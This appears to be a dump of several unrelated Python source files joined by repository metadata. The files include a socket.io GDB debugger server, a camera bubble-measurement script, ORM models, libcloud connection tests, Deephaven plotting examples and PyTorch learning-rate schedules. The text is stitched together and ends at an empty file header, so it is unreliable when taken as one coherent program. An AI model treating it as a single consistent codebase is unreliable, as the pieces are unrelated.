async def create_gdb_process(sid):
stop_queue = asyncio.Queue()
gdb_sessions[sid] = await GDBProcess.create(runnable, stop_queue, env={'KEY': access_key}, log_fn=log)
loop = asyncio.get_event_loop()
stop_queue_readers[sid] = loop.create_task(stop_queue_reader(sid, stop_queue))
async def delete_gdb_process(sid):
if sid in gdb_sessions:
stop_queue_readers[sid].cancel()
del stop_queue_readers[sid]
await gdb_sessions[sid].release()
del gdb_sessions[sid]
@sio.on('start')
async def start(sid):
await delete_gdb_process(sid)
await create_gdb_process(sid)
# Reading registers doesn't work on ubuntu 18.04 for some reason.
    # Step once as a workaround
step(sid)
async def update_all(sid):
log('updating sid {}'.format(sid))
regs_task = getregs(sid)
maps_task = getmaps(sid)
asm_task = getasm(sid, {'addr': await gdb_sessions[sid].get_reg('rip'), 'count': 100})
await asyncio.gather(regs_task, maps_task, asm_task)
log('update done')
@sio.on('step')
def step(sid):
gdb_sessions[sid].step()
@sio.on('cont')
def cont(sid):
gdb_sessions[sid].cont()
@sio.on('stop')
def stop(sid):
gdb_sessions[sid].interrupt()
async def getregs(sid):
regs = await gdb_sessions[sid].get_regs()
await sio.emit('regs', regs, room=sid)
@sio.on('mem')
async def getmem(sid, msg):
addr = msg['addr']
count = msg['count']
data = gdb_sessions[sid].read_mem(addr, count)
await sio.emit('mem', {'addr': addr, 'data': data}, room=sid)
async def getmaps(sid):
maps = gdb_sessions[sid].maps()
await sio.emit('maps', maps, room=sid)
@sio.on('break')
async def setbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].set_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('unbreak')
async def rmbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].remove_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('search')
async def search(sid, data):
q = data['q']
qtype = data['type']
await sio.emit('search_result', gdb_sessions[sid].search(q.encode(), qtype), room=sid)
async def getasm(sid, data):
addr = data['addr']
count = data['count']
result = []
for _ in range(count):
data = gdb_sessions[sid].read_mem(addr, MAX_INSN_LEN)
try:
disasm = next(capstone_md.disasm_lite(data, addr))
except StopIteration:
break
result.append(disasm)
addr += disasm[1]
await sio.emit('asm', result, room=sid)
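# Note: capstone's disasm_lite() yields (address, size, mnemonic, op_str)
# tuples, so disasm[1] above is the instruction size used to advance addr.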
if __name__ == '__main__':
web.run_app(app)
| 27.960227 | 104 | 0.710018 |
b930187de467bdc99d38231d4b217f6589a62613
| 2,039 |
py
|
Python
|
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | null | null | null |
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | null | null | null |
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | 1 |
2021-08-09T14:57:57.000Z
|
2021-08-09T14:57:57.000Z
|
from datetime import datetime
from pypylon import pylon
import nimmAuf
import smbus2
import os
import argparse
import bestimmeVolumen
from threading import Thread
import time
programmstart = time.time()
# Parse arguments (e.g. run 'starteMessung.py -n 100' in the terminal)
ap = argparse.ArgumentParser(description="""Script for recording images of the test section and for
                                            determining the volume of air bubbles""")
ap.add_argument("-n", "--number", default=400, type=int, help="Number of frames to record. Default: 400 frames")
ap.add_argument("-fr", "--framerate", default=100, type=int, help="Framerate in fps. Guide values: flow <3 ml/s: 50 fps, 3-6 ml/s: 100 fps, >6 ml/s: 200 fps; Default: 100 fps")
args = vars(ap.parse_args())
# Extract the parsed arguments
numberOfImagesToGrab = args['number']
framerate = args['framerate']
if __name__ == '__main__':
startzeit = time.time()
    # Check whether a camera is connected
    devices = pylon.TlFactory.GetInstance().EnumerateDevices()
    if len(devices) == 0:
        print("Keine Kamera angeschlossen oder Kamera woanders geöffnet.")
        exit()  # 'return' is a syntax error at module level; exit instead
    # Check whether the pressure sensor is connected
try:
bus = smbus2.SMBus(0)
        bus.read_i2c_block_data(0x40, 0, 2) # receive 2 bytes
except OSError:
print("Kein Drucksensor angeschlossen")
exit()
    # Build a unique directory name from the current time
    dirname = f'{datetime.now().strftime("%Y-%m-%d-%H-%M-%S")}'
    os.mkdir(dirname) # create the directory
print(f"Ordnername: {dirname}")
beginn = time.time()-programmstart
    # Start the capture and processing threads
t_aufnahme = Thread(target=nimmAuf.starte, args=(dirname, numberOfImagesToGrab, framerate, startzeit))
t_tracke = Thread(target=bestimmeVolumen.tracke, args=(dirname, numberOfImagesToGrab))
t_aufnahme.start()
t_tracke.start()
t_aufnahme.join()
t_tracke.join()
| 34.559322 | 169 | 0.703776 |
b978fbbcd4002601ca1e2723cae4385002e671d8
| 2,063 |
py
|
Python
|
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from uuid import uuid4
from sqlalchemy import Index, Column, Text, Table, ForeignKey
from sqlalchemy.orm import object_session
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
spoken_association_table = Table(
'spoken_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
written_association_table = Table(
'written_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
mother_tongue_association_table = Table(
'mother_tongue_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
class Language(Base):
__tablename__ = 'languages'
__table_args__ = (
Index('unique_name', 'name', unique=True),
)
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False)
@property
def speakers_count(self):
session = object_session(self)
return session.query(
spoken_association_table).filter_by(lang_id=self.id).count()
@property
def writers_count(self):
session = object_session(self)
return session.query(
written_association_table).filter_by(lang_id=self.id).count()
@property
def native_speakers_count(self):
"""Having it as mother tongue..."""
session = object_session(self)
return session.query(
mother_tongue_association_table).filter_by(lang_id=self.id).count()
@property
def deletable(self):
return (
self.speakers_count
+ self.writers_count
+ self.native_speakers_count
) == 0
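# Minimal usage sketch (assumes a configured SQLAlchemy session; names and
# values are illustrative, not part of this module):
#
#     session.add(Language(name='French'))
#     lang = session.query(Language).filter_by(name='French').one()
#     if lang.deletable:
#         session.delete(lang)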
| 25.469136 | 79 | 0.650994 |
b9b2dd8fc97fddaaa64ec64957043ee8e8088e39
| 615 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
from frappe.contacts.address_and_contact import load_address_and_contact
class Member(Document):
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self)
def validate(self):
self.validate_email_type(self.email)
def validate_email_type(self, email):
from frappe.utils import validate_email_add
validate_email_add(email.strip(), True)
| 29.285714 | 72 | 0.786992 |
0ec1afd2facbda8f3febe8ca1dc7c71fb6558f04
| 1,993 |
py
|
Python
|
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from typing import Optional
from watchmen_auth import PrincipalService
from watchmen_data_kernel.cache import CacheService
from watchmen_data_kernel.common import DataKernelException
from watchmen_data_kernel.external_writer import find_external_writer_create, register_external_writer_creator
from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator
from watchmen_meta.system import ExternalWriterService as ExternalWriterStorageService
from watchmen_model.common import ExternalWriterId
from watchmen_model.system import ExternalWriter
def register_external_writer(external_writer: ExternalWriter) -> None:
create = find_external_writer_create(external_writer.type)
if create is None:
raise DataKernelException(f'Creator not found for external writer[{external_writer.dict()}].')
register_external_writer_creator(external_writer.writerCode, create())
class ExternalWriterService:
def __init__(self, principal_service: PrincipalService):
self.principalService = principal_service
def find_by_id(self, writer_id: ExternalWriterId) -> Optional[ExternalWriter]:
external_writer = CacheService.external_writer().get(writer_id)
if external_writer is not None:
if external_writer.tenantId != self.principalService.get_tenant_id():
raise DataKernelException(
f'External writer[id={writer_id}] not belongs to '
f'current tenant[id={self.principalService.get_tenant_id()}].')
register_external_writer(external_writer)
return external_writer
storage_service = ExternalWriterStorageService(
ask_meta_storage(), ask_snowflake_generator(), self.principalService)
storage_service.begin_transaction()
try:
# noinspection PyTypeChecker
external_writer: ExternalWriter = storage_service.find_by_id(writer_id)
if external_writer is None:
return None
CacheService.external_writer().put(external_writer)
register_external_writer(external_writer)
return external_writer
finally:
storage_service.close_transaction()
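# Usage sketch (the principal and writer id are illustrative):
#
#     service = ExternalWriterService(principal_service)
#     writer = service.find_by_id(writer_id)  # cache hit, else meta storage
#
# Either path also registers the writer's creator, so the writer is usable
# immediately after the lookup.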
| 41.520833 | 110 | 0.831912 |
16abab9c314c051765ffd991fb6c764e6cf24cb5
| 235 |
py
|
Python
|
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2020-03-10T07:43:08.000Z
|
2020-03-10T07:43:08.000Z
|
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2020-04-03T05:24:47.000Z
|
2020-04-03T05:24:47.000Z
|
import threading
from concurrent.futures import ThreadPoolExecutor
from service.train import do_train
def thread_runner(thread_num, func, *args):
executor = ThreadPoolExecutor(thread_num)
    # submit the function that was passed in (not the hard-coded do_train) and
    # return the Future so callers can wait on the result
    future = executor.submit(func, *args)
    return future
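# Example call site (argument names are hypothetical): the returned Future
# lets the caller wait for, or inspect, the training run:
#
#     future = thread_runner(2, do_train, dataset, model)
#     future.result()  # blocks until do_train finishes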
| 26.111111 | 49 | 0.795745 |
4c0f174360fe29201e22d16e102aa2c61bad20f2
| 262 |
py
|
Python
|
production/pygsl-0.9.5/testing/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
production/pygsl-0.9.5/testing/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/testing/__init__.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
"""
Here you find either newly implemented modules or alternate implementations
of existing modules. This directory is intended to hold a second implementation
alongside the main implementation, so that there can be a discussion about
which implementation to favor in the long run.
"""
| 37.428571 | 78 | 0.80916 |
5de70a07393091d4b0d1b81bb83f4335c31b6482
| 3,329 |
py
|
Python
|
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | null | null | null |
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 1 |
2022-03-03T21:24:40.000Z
|
2022-03-03T21:24:54.000Z
|
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | null | null | null |
import deephaven.TableTools as tt
import deephaven.Plot as plt
t = tt.emptyTable(50)\
.update("X = i + 5", "XLow = X -1", "XHigh = X + 1", "Y = Math.random() * 5", "YLow = Y - 1", "YHigh = Y + 1", "USym = i % 2 == 0 ? `AAPL` : `MSFT`")
p = plt.plot("S1", t, "X", "Y").lineColor("black").show()
p2 = plt.plot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
p3 = plt.plot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
p4 = plt.plot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
p4 = plt.plot3d("S1", t, "X", "X", "Y").show()
pBy = plt.plotBy("S1", t, "X", "Y", "USym").show()
pBy = plt.plot3dBy("S1", t, "X", "X", "Y", "USym").show()
cp = plt.catPlot("S1", t, "X", "Y").lineColor("black").show()
cp2 = plt.catPlot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
cp3 = plt.catPlot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
cp4 = plt.catPlot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
cp = plt.catPlot3d("S1", t, "X", "X", "Y").show()
cpBy = plt.catPlotBy("S1", t, "X", "Y", "USym").show()
cpBy = plt.catPlot3dBy("S1", t, "X", "X", "Y", "USym").show()
pp = plt.piePlot("S1", t, "X", "Y")
chp = plt.catHistPlot("S1", t, "X").show()
hp = plt.histPlot("S1", t, "X", 5).show()
hp = plt.histPlot("S1", t, "X", 0, 10, 5).show()
ep = plt.errorBarXY("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh").show()
epBy = plt.errorBarXYBy("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh", "USym").show()
ep2 = plt.errorBarX("S1", t, "X", "XLow", "XHigh", "Y").show()
epBy2 = plt.errorBarXBy("S1", t, "X", "XLow", "XHigh", "Y", "USym").show()
ep3 = plt.errorBarY("S1", t, "X", "Y", "YLow", "YHigh").show()
epBy3 = plt.errorBarYBy("S1", t, "X", "Y", "YLow", "YHigh", "USym").show()
doubles = [3, 4, 3, 5, 4, 5]
time = 1491946585000000000
t = tt.newTable(tt.col("USym", ["A", "B", "A", "B", "A", "B"]),
tt.doubleCol("Open", doubles), tt.doubleCol("High", doubles),
tt.doubleCol("Low", doubles), tt.doubleCol("Close", doubles))
t = t.updateView("Time = new DBDateTime(time + (MINUTE * i))")
ohlc = plt.ohlcPlot("Test1", t, "Time", "Open", "High", "Low", "Close")
ohlcPlotBy = plt.figure().newChart(0)\
.chartTitle("Chart Title")\
.newAxes()\
.xLabel("X")\
.yLabel("Y")\
.ohlcPlotBy("Test1", t, "Time", "Open", "High", "Low", "Close", "USym")
categories = ["Samsung", "Others", "Nokia", "Apple", "MSFT"]
valuesD = [27.8, 55.3, 16.8, 17.1, 23.1]
valuesI = [27, 55, 16, 17, 15]
ap = plt.plot("S1", valuesD, valuesI).show()
ap = plt.plot3d("S1", valuesI, valuesI, valuesI).show()
acp = plt.catPlot("S1", categories, valuesI).show()
acp2 = plt.catPlot3d("S1", categories, categories, valuesD).show()
achp = plt.catHistPlot("S1", categories).show()
app = plt.figure().xLabel("X").yLabel("Y").piePlot("S1", categories, valuesI).pointLabelFormat("{0}").show()
aep = plt.errorBarXY("S1", valuesD, valuesD, valuesD, valuesD, valuesD, valuesD).show()
aep2 = plt.errorBarX("S1", valuesD, valuesD, valuesD, valuesD).show()
aep3 = plt.errorBarY("S1", valuesD, valuesD, valuesD, valuesD).show()
hp = plt.histPlot("S1", valuesD, 5).show()
hp = plt.histPlot("S1", valuesD, 0, 10, 5).show()
hp = plt.histPlot("S1", valuesI, 5).show()
| 37.829545 | 153 | 0.578252 |
5df79191a02e9cdc36eab83fa9b24e2f2d9fe213
| 7,695 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/apache_libcloud-0.15.1-py2.7.egg/libcloud/test/test_connection.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
libcloud/test/test_connection.py
|
elastacloud/libcloud
|
f3792b2dca835c548bdbce0da2eb71bfc9463b72
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
libcloud/test/test_connection.py
|
elastacloud/libcloud
|
f3792b2dca835c548bdbce0da2eb71bfc9463b72
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
from mock import Mock, call
from libcloud.test import unittest
from libcloud.common.base import Connection
from libcloud.common.base import LoggingConnection
class ConnectionClassTestCase(unittest.TestCase):
def setUp(self):
self.originalConnect = Connection.connect
self.originalResponseCls = Connection.responseCls
Connection.connect = Mock()
Connection.responseCls = Mock()
Connection.allow_insecure = True
def tearDown(self):
Connection.connect = self.originalConnect
        Connection.responseCls = self.originalResponseCls  # restore the saved class (was a no-op self-assignment)
Connection.allow_insecure = True
def test_dont_allow_insecure(self):
Connection.allow_insecure = True
Connection(secure=False)
Connection.allow_insecure = False
        expected_msg = (r'Non https connections are not allowed \(use '
                        r'secure=True\)')
self.assertRaisesRegexp(ValueError, expected_msg, Connection,
secure=False)
def test_content_length(self):
con = Connection()
con.connection = Mock()
# GET method
# No data, no content length should be present
con.request('/test', method='GET', data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# '' as data, no content length should be present
con.request('/test', method='GET', data='')
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# 'a' as data, content length should be present (data in GET is not
# correct, but anyways)
con.request('/test', method='GET', data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
# POST, PUT method
# No data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# '' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# No data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# '' as data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# 'a' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
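    # Summary of the policy exercised above: GET sends Content-Length only for
    # a non-empty body, POST/PUT always send it (defaulting to '0'), and raw
    # requests keep a caller-supplied Content-Length untouched.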
def test_cache_busting(self):
params1 = {'foo1': 'bar1', 'foo2': 'bar2'}
params2 = [('foo1', 'bar1'), ('foo2', 'bar2')]
con = Connection()
con.connection = Mock()
con.pre_connect_hook = Mock()
con.pre_connect_hook.return_value = {}, {}
con.cache_busting = False
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params1)
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params2)
con.cache_busting = True
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0])
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0][len(params2)])
def test_context_is_reset_after_request_has_finished(self):
context = {'foo': 'bar'}
def responseCls(connection, response):
connection.called = True
self.assertEqual(connection.context, context)
con = Connection()
con.called = False
con.connection = Mock()
con.responseCls = responseCls
con.set_context(context)
self.assertEqual(con.context, context)
con.request('/')
# Context should have been reset
self.assertTrue(con.called)
self.assertEqual(con.context, {})
# Context should also be reset if a method inside request throws
con = Connection()
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.connection.request = Mock(side_effect=ssl.SSLError())
try:
con.request('/')
except ssl.SSLError:
pass
self.assertEqual(con.context, {})
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.responseCls = Mock(side_effect=ValueError())
try:
con.request('/')
except ValueError:
pass
self.assertEqual(con.context, {})
def test_log_curl(self):
url = '/test/path'
body = None
headers = {}
con = LoggingConnection()
con.protocol = 'http'
con.host = 'example.com'
con.port = 80
for method in ['GET', 'POST', 'PUT', 'DELETE']:
cmd = con._log_curl(method=method, url=url, body=body,
headers=headers)
self.assertEqual(cmd, 'curl -i -X %s --compress http://example.com:80/test/path' %
(method))
# Should use --head for head requests
cmd = con._log_curl(method='HEAD', url=url, body=body, headers=headers)
self.assertEqual(cmd, 'curl -i --head --compress http://example.com:80/test/path')
if __name__ == '__main__':
sys.exit(unittest.main())
| 36.995192 | 94 | 0.624172 |
f8d46f993d25bd7f9f34660f23bf18928f5a3963
| 5,672 |
py
|
Python
|
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | 1 |
2022-01-03T14:00:17.000Z
|
2022-01-03T14:00:17.000Z
|
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | null | null | null |
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | 1 |
2021-12-21T09:50:53.000Z
|
2021-12-21T09:50:53.000Z
|
import numpy as np
import logging
import numbers
import torch
import math
import json
import sys
from torch.optim.lr_scheduler import LambdaLR
from torchvision.transforms.functional import pad
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class ConstantLRSchedule(LambdaLR):
""" Constant learning rate schedule.
"""
def __init__(self, optimizer, last_epoch=-1):
super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch)
class WarmupConstantSchedule(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
return 1.
class WarmupLinearSchedule(LambdaLR):
""" Linear warmup and then linear decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Linearly decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps.
"""
def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1, self.warmup_steps))
return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps)))
class WarmupCosineSchedule(LambdaLR):
""" Linear warmup and then cosine decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps following a cosine curve.
        If `cycles` differs from the default 0.5, the cosine completes that many full cycles over the decay phase.
"""
def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
self.cycles = cycles
super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
# progress after warmup
progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps))
return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress)))
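# Usage sketch for the schedules above (values are illustrative). Note that
# they are stepped once per training step, not once per epoch:
#
#     optimizer = torch.optim.SGD(model.parameters(), lr=3e-2)
#     scheduler = WarmupCosineSchedule(optimizer, warmup_steps=500, t_total=10000)
#     for step in range(10000):
#         ...              # forward/backward pass
#         optimizer.step()
#         scheduler.step()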
def get_padding(image):
w, h = image.size
max_wh = np.max([w, h])
h_padding = (max_wh - w) / 2
v_padding = (max_wh - h) / 2
l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5
t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5
r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5
b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5
padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad))
return padding
class NewPad(object):
def __init__(self, fill=0, padding_mode='constant'):
assert isinstance(fill, (numbers.Number, str, tuple))
assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
self.fill = fill
self.padding_mode = padding_mode
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be padded.
Returns:
PIL Image: Padded image.
"""
return pad(img, get_padding(img), self.fill, self.padding_mode)
def __repr__(self):
        return self.__class__.__name__ + '(fill={0}, padding_mode={1})'. \
            format(self.fill, self.padding_mode)
def find_device():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return device
def read_json(data):
with open(data) as f:
return json.load(f)
def save_json(data, path):
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f)
def setup_logger():
logger = logging.getLogger('train')
logger.setLevel(logging.INFO)
if len(logger.handlers) == 0:
formatter = logging.Formatter('%(asctime)s | %(message)s')
ch = logging.StreamHandler(stream=sys.stdout)
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(model, path):
torch.save(model.state_dict(), path)
def reverse_norm_image(image):
MEAN = torch.tensor([0.485, 0.456, 0.406])
STD = torch.tensor([0.229, 0.224, 0.225])
reverse_image = image * STD[:, None, None] + MEAN[:, None, None]
return reverse_image.permute(1, 2, 0).cpu().numpy()
| 33.761905 | 117 | 0.653738 |
5d1d5be9e9e0382909fb3777ed89becc272c0e93
| 767 |
py
|
Python
|
Kapitel_1/_1_public_private.py
|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | 1 |
2020-12-24T15:42:54.000Z
|
2020-12-24T15:42:54.000Z
|
Kapitel_1/_1_public_private.py
|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | null | null | null |
Kapitel_1/_1_public_private.py
